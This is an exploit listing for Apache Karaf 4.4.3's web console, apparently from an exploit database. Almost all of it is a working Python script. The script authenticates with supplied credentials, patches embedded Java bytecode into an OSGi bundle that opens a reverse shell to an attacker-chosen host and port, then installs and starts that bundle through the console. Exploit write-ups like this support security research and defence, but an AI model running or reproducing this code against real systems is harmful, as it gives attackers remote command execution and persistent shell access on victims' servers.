
Karaf v4.4.3 Console - RCE

🗓️ 16 Mar 2024 00:00:00Reported by Andrzej Olchawa, Milenko StarcikType 

Karaf v4.4.3 Console RCE exploit for reverse shell

#!/usr/bin/python

# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#           [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
#                   --lhost=192.168.0.100 --lport=4444 \
#                   --creds=karaf:karaf


"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests

# MANIFEST.MF written into the generated bundle JAR by generate_payload().
# The OSGi Bundle-Activator header names the class the framework instantiates
# when the bundle is started; Import-Package lists its only declared import.
# Lines are joined with "\n" and the manifest carries no trailing newline.
MANIFEST_CONTENT = "\n".join((
    "Bundle-Name: RevShell",
    "Bundle-Description: Bundle openning a reverse shell connection.",
    "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator",
    "Bundle-Vendor: VisionSpace",
    "Bundle-Version: 1.0.0",
    "Import-Package: org.osgi.framework",
    "Bundle-Activator: com.visionspace.osgi.revshell.Activator",
))

# Activator.class bytecode template: a compiled Java class file (magic
# 0xCAFEBABE, major version 0x37 = 55) that generate_payload() patches and
# writes into the bundle JAR. Two CONSTANT_Utf8 entries hold the placeholders
# "<LHOST>" and "<LPORT>", each preceded by its 0x07 length byte; those are
# the only bytes that change between runs. The remaining constant-pool text is
# fixed and legible in the hex below — "sh", java/lang/ProcessBuilder,
# java/net/Socket, the class name com/visionspace/osgi/revshell/Activator and
# the message "Thank you for pwning with us!" — so these literals appear
# verbatim in every JAR this script produces and are usable as indicators.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
    b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
    b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
    b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
    b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
    b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
    b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
    b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
    b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
    b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
    b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
    b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
    b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
    b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
    b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
    b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
    b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
    b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
    b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
    b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
    b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
    b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
    b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
    b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
    b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
    b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
    b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
    b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
    b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
    b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
    b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
    b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
    b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
    b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
    b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
    b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
    b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
    b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
    b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
    b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
    b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
    b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
    b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
    b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
    b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
    b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
    b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
    b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
    b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
    b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
    b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
    b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
    b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
    b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
    b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
    b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
    b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
    b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
    b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
    b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
    b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
    b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
    b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
    b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
    b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
    b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
    b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
    b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
    b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
    b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
    b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
    b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
    b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
    b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
    b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
    b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
    b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
    b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
    b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
    b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
    b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
    b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
    b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
    b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
    b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
    b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
    b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
    b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
    b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
    b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
    b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
    b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
    b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
    b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
    b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
    b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
    b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
    b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
    b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
    b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
    b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
    b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
    b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
    b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
    b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
    b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
    b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
    b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
    b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
    b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
    b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
    b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
    b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
    b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
    b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
    b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
    b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
    b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
    b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
    b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
    b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
    b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
    b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
    b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
    b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
    b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
    b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
    b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
    b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
    b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
    b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
    b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
    b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
    b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
    b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
    b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
    b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
    b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
    b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
    b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
    b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
    b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
    b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
    b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
    b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
    b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
    b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
    b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
    b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
    b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
    b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
    b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
    b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
    b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
    b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
    b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
    b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
    b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
    b"\x32"

# Byte patterns that generate_payload() searches for inside the class
# bytecode. Each one is the single length byte (0x07) that precedes the
# CONSTANT_Utf8 text in the template followed by the seven-character
# placeholder, so a replacement has to carry its own length byte as well.
ACTIVATOR_CLASS_LHOST_TAG = bytes([len("<LHOST>")]) + b"<LHOST>"
ACTIVATOR_CLASS_LPORT_TAG = bytes([len("<LPORT>")]) + b"<LPORT>"


def parse():
    """Parse the command-line options.

    Returns:
        An ``argparse.Namespace`` with ``rhost``, ``rport`` (int), ``lhost``,
        ``lport`` (int) and ``creds``; all five are mandatory. ``--version``
        prints the version string and exits.
    """
    parser = argparse.ArgumentParser(
        prog="Karaf-Console-RCE",
        description=(
            "This tool will let you open a reverse shell from the "
            "system that is running Karaf Console"
        ),
        epilog="Happy Hacking! :)",
    )

    # (option name, help text, value type) — every entry is required, and the
    # order here is the order shown in --help.
    required_options = (
        ("rhost", "remote host", str),
        ("rport", "remote port", int),
        ("lhost", "local host", str),
        ("lport", "local port", int),
        ("creds", "credentials in format <username:password>", str),
    )
    for name, help_text, value_type in required_options:
        parser.add_argument(f"--{name}", dest=name, help=help_text,
                            type=value_type, required=True)

    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    return parser.parse_args()


def extract_jsessionid(cookie):
    """Return the JSESSIONID value from a Set-Cookie string, or None.

    The value is everything after ``JSESSIONID=`` up to the next ``;``. Only
    the first occurrence counts, and the pattern is not anchored, so a cookie
    whose name merely ends in ``JSESSIONID`` would also match.
    """
    match = re.search("JSESSIONID=([^;]+)", cookie)
    return match.group(1) if match else None


def authenticate(target, basic_auth):
    """GET *target* with a Basic ``Authorization`` header and return the JSESSIONID.

    One request is made with redirects disabled and a 10 s timeout. The
    session id is only read from ``Set-Cookie`` when the server answers 302.

    Returns:
        The JSESSIONID string, or None when the status is not 302, the
        ``Set-Cookie`` value is empty, or it contains no JSESSIONID.

    Raises:
        KeyError: on a 302 that carries no ``Set-Cookie`` header (the header
            lookup is not guarded).
        requests.RequestException: on connection or timeout failures.
    """
    response = requests.get(
        target,
        headers={"Authorization": basic_auth},
        allow_redirects=False,
        timeout=10,
    )

    if response.status_code != 302:
        return None

    set_cookie = response.headers["Set-Cookie"]
    if not set_cookie:
        return None

    return extract_jsessionid(set_cookie)


def generate_payload(lhost, lport):
    """Build the bundle JAR with *lhost*/*lport* patched into Activator.class.

    Each placeholder in ACTIVATOR_CLASS_BYTECODE_TEMPLATE is a one-byte length
    followed by the literal ``<LHOST>`` / ``<LPORT>``; it is swapped for the
    same layout carrying the real value (length byte, then one byte per
    character via ``ord``). The patched class and MANIFEST_CONTENT are then
    written to an in-memory deflated ZIP.

    Returns:
        The JAR as ``bytes``.

    Raises:
        ValueError: if a value is longer than 255 characters or contains a
            character whose code point exceeds 255 (neither fits one byte).
    """
    def length_prefixed(value):
        # One byte of length, then one byte per character of the value.
        encoded = bytearray([len(value)])
        encoded.extend(ord(ch) for ch in value)
        return encoded

    patched_class = (
        ACTIVATOR_CLASS_BYTECODE_TEMPLATE
        .replace(ACTIVATOR_CLASS_LHOST_TAG, length_prefixed(lhost))
        .replace(ACTIVATOR_CLASS_LPORT_TAG, length_prefixed(str(lport)))
    )

    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("com/visionspace/osgi/revshell/Activator.class",
                     patched_class)
        jar.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)

    return buffer.getvalue()


def deploy_payload(target, basic_auth, jsessionid, payload):
    """POST *payload* to the console's bundle endpoint and request that it start.

    One multipart POST goes to ``<target>/bundles`` carrying the Basic
    ``Authorization`` header, the ``JSESSIONID`` cookie, the JAR as form file
    ``bundlefile`` (filename ``revshell.jar``, type
    ``application/x-java-archive``) and the form fields ``action=install``,
    ``bundlestart=start`` and ``bundlestartlevel=80``. Redirects are not
    followed; the timeout is 10 s.

    Returns:
        True when the server answers 302, False for any other status.

    Raises:
        requests.RequestException: on connection or timeout failures.
    """
    request_options = {
        "headers": {"Authorization": basic_auth},
        "cookies": {"JSESSIONID": jsessionid},
        "files": {
            "bundlefile": (
                "revshell.jar", payload, "application/x-java-archive"),
        },
        "data": {
            "action": "install",
            "bundlestart": "start",
            "bundlestartlevel": 80,
        },
        "timeout": 10,
        "allow_redirects": False,
    }

    response = requests.post(f"{target}/bundles", **request_options)

    return response.status_code == 302


def generate_basic_auth(creds):
    """Turn a ``user:password`` string into an HTTP Basic ``Authorization`` value.

    *creds* is UTF-8 encoded and base64'd exactly as given; the
    ``user:password`` shape is not validated here.
    """
    token = base64.b64encode(creds.encode("utf-8"))
    return "Basic " + token.decode("utf-8")


def create_target_url(rhost, rport):
    """Return the base URL of the Karaf web console on *rhost*:*rport*.

    The scheme is fixed to plain ``http``, so the Basic credentials attached
    by the callers travel unencrypted; the path is the console's
    ``/system/console``.
    """
    return "http://{}:{}/system/console".format(rhost, rport)


def main(args):
    """Run login, payload generation and deployment in order, reporting on stdout.

    Args:
        args: the parsed namespace from ``parse()`` (``rhost``, ``rport``,
            ``lhost``, ``lport``, ``creds``).

    Each step prints a ``[*]`` progress line and stops with a ``[-]`` line on
    the first failure; ``[+] Done.`` means the deploy request returned 302.
    """
    target = create_target_url(args.rhost, args.rport)

    print("[*] Login...")
    basic_auth = generate_basic_auth(args.creds)
    jsessionid = authenticate(target, basic_auth)
    if not jsessionid:
        print("[-] Login failed!")
        return
    print("[+] Session established.")

    print("[*] Generating payload...")
    payload = generate_payload(args.lhost, args.lport)
    if not payload:
        # generate_payload() always returns a non-empty ZIP, so this branch
        # is defensive only.
        print("[-] Failed to generate the payload!")
        return

    print("[*] Deploying payload...")
    if deploy_payload(target, basic_auth, jsessionid, payload):
        print("[+] Done.")
    else:
        print("[-] Failed to deploy the payload!")


# Script entry point: parse the CLI options, then run the full sequence.
if __name__ == "__main__":
    main(parse())
